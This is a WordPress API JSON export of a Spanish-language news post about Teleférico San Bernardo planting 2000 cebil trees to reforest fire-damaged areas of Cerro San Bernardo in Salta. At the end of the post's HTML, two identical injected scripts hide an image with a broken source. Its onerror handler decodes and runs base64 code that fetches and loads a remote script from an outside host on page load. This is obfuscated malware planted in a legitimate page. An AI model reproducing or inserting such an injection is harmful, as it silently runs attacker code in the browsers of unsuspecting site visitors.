{"id":1930,"date":"2022-12-12T18:06:49","date_gmt":"2022-12-12T21:06:49","guid":{"rendered":"https:\/\/circuitosalta.com.ar\/?p=1930"},"modified":"2025-08-14T00:28:15","modified_gmt":"2025-08-14T03:28:15","slug":"teleferico-san-bernardo-continua-con-el-plan-de-reforestacion-del-cerro","status":"publish","type":"post","link":"https:\/\/circuitosalta.com.ar\/?p=1930","title":{"rendered":"Telef\u00e9rico San Bernardo contin\u00faa con el plan de reforestaci\u00f3n del cerro"},"content":{"rendered":"\n<h3 class=\"has-cyan-bluish-gray-color has-text-color has-background wp-block-heading\" style=\"background-color:#076118\"><em>Se trata de una iniciativa en el marco del programa ECOCIMAS que pretende reforestar las \u00e1reas del cerro San Bernardo afectadas por incendios. En esta etapa se sembrar\u00e1n 2000 ejemplares de cebil.<\/em><\/h3>\n\n\n\n<p>Telef\u00e9rico San Bernardo, en un proyecto conjunto con la Universidad Nacional de Salta y la fundaci\u00f3n Inti Wasi, sembrar\u00e1 2000 ejemplares de cebil, especie declarada por ley como \u00e1rbol hist\u00f3rico de la provincia de Salta, como parte del plan de reforestaci\u00f3n del cerro San Bernardo en zonas afectadas por los incendios forestales.<\/p>\n\n\n\n<p>Esta acci\u00f3n se da en el marco del programa ECOCIMAS, iniciado por el Telef\u00e9rico San Bernardo en el a\u00f1o 2019 con el objetivo de acercar a la comunidad su compromiso con el medio ambiente y la compensaci\u00f3n de huella de carbono. Este programa encuadra las acciones relacionadas con el cuidado y la preservaci\u00f3n del entorno natural que realiza la empresa desde su \u00e1rea de Medio Ambiente, trabajando de manera conjunta, mediante convenios, con otras instituciones y empresas como Sungreen y los Hoteles Alejandro I y Casa Real, en el marco de la certificaci\u00f3n de Hoteles M\u00e1s Verdes.<\/p>\n\n\n\n<p>En este contexto surge este proyecto de forestaci\u00f3n que alude a nuestra historia y destaca al \u00e1rbol insignia de Salta, el cebil colorado. Este \u00e1rbol fue declarado hist\u00f3rico mediante la Ley Provincial N\u00b08284, por haber cobijado al General Mart\u00edn Miguel de G\u00fcemes en su lecho de muerte. Tambi\u00e9n, los estudios de vegetaci\u00f3n sobre los cerros San Bernardo y Ala Delta nos muestran bosques de cebil y horco cebil, motivos por los cuales se decidi\u00f3 implementar esta especie.<\/p>\n\n\n\n<p>Para llevar adelante esta acci\u00f3n, se recolectaron semillas de \u00e1rboles padres, que se lograron germinar con \u00e9xito, para realizar el trasplante en esta etapa. Estos 2000 \u00e1rboles ser\u00e1n colocados en sitios donde hubo alg\u00fan tipo de perturbaci\u00f3n en el ecosistema y tendr\u00e1n un manejo integrado que permita la sobrevivencia una vez plantados definitivamente.<\/p>\n\n\n\n<p>Cabe destacar que el programa ECOCIMAS tambi\u00e9n invita a participar a la comunidad por medio de eventos y acciones para el cuidado del medio ambiente. Las escuelas se hacen part\u00edcipes recorriendo el sendero ecol\u00f3gico, sembrando \u00e1rboles y aprendiendo sobre la flora y fauna de la zona.<\/p>\n\n\n\n<p>\u201cEs un placer para nosotros llevar adelante este proyecto que no surge como una acci\u00f3n aislada, sino como parte de un plan de reforestaci\u00f3n de esta zona de reserva que tanto sufri\u00f3 el impacto de los incendios forestales\u201d indic\u00f3&nbsp;<strong>Mart\u00edn Miranda<\/strong>, presidente del Telef\u00e9rico San Bernardo, agregando que \u201ccon estas iniciativas pretendemos contribuir al cuidado y la conservaci\u00f3n del medio ambiente pero tambi\u00e9n a la concientizaci\u00f3n, para que cada vez m\u00e1s personas se sumen a la causa y unamos esfuerzos para preservar nuestro entorno natural\u201d.<\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<p>Fuente:\u00a0<strong><a href=\"https:\/\/www.salta.gob.ar\/prensa\/noticias\/teleferico-san-bernardo-continua-con-el-plan-de-reforestacion-del-cerro-86716\" target=\"_blank\" rel=\"noopener\">Secretar\u00eda de Prensa y Comunicaci\u00f3n<\/a><\/strong><\/p>\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script><script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>Se trata de una iniciativa en el marco del programa ECOCIMAS que pretende reforestar las \u00e1reas del cerro San Bernardo afectadas por incendios. En esta etapa se sembrar\u00e1n 2000 ejemplares de cebil. Telef\u00e9rico San Bernardo, en un proyecto conjunto con la Universidad Nacional de Salta y la fundaci\u00f3n Inti Wasi, sembrar\u00e1 2000 ejemplares de cebil, [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":1931,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"tdm_status":"","tdm_grid_status":"","footnotes":""},"categories":[14,4,15],"tags":[],"class_list":{"0":"post-1930","1":"post","2":"type-post","3":"status-publish","4":"format-standard","5":"has-post-thumbnail","7":"category-anuncios","8":"category-paisajes","9":"category-provincial"},"_links":{"self":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/1930"}],"collection":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=1930"}],"version-history":[{"count":3,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/1930\/revisions"}],"predecessor-version":[{"id":7247,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/1930\/revisions\/7247"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/media\/1931"}],"wp:attachment":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=1930"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=1930"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=1930"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}